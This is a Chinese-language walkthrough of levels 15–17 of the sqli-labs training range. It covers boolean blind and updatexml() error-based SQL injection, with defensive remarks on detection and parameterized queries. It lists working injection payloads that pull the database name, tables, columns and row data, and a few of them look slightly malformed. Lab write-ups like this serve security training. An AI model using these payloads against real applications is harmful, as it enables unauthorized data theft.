【靶场训练】sqli-labs
作者:互联网
less-15
布尔盲注:页面不回显查询结果,只能根据条件为真/假时响应的差异逐位推断数据。这类攻击会产生大量结构相似、仅个别字符不同的请求,可作为检测特征;根本的修复方式是使用参数化查询。
' or (length(database())=8)-- lq 判断当前数据库名的长度是否为 8
'or (substr(database(),1,1)='s' -- lq) 猜库名
'or (substr(select table_name from information_schema.tables where table_schema='security' limit 0,1,1,1)='s' -- lq) 猜表名
.......
less-16
布尔盲注,方法同 less-15,区别在于闭合方式为 ("")
less-17
报错注入攻击:利用 updatexml() 在 XPath 参数不合法时抛出的错误信息带出查询结果,前提是应用把数据库错误原样输出到页面。防御上应使用参数化查询,并且不向用户回显数据库错误信息。
账号输入admin。
' and updatexml(1,concat('~',(select database()),'~'),1) -- lq 库名
' and updatexml(1,concat('~',(select table_name from information_schema.tables where table_schema='security' limit 0,1),'~'),1) -- lq 判断表名
' and updatexml(1,concat('~',(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),'~'),1) -- lq 判断字段名
' and updatexml(1,concat('~',(select id from security.emails limit 0,1),'~'),1) -- lq 表中数据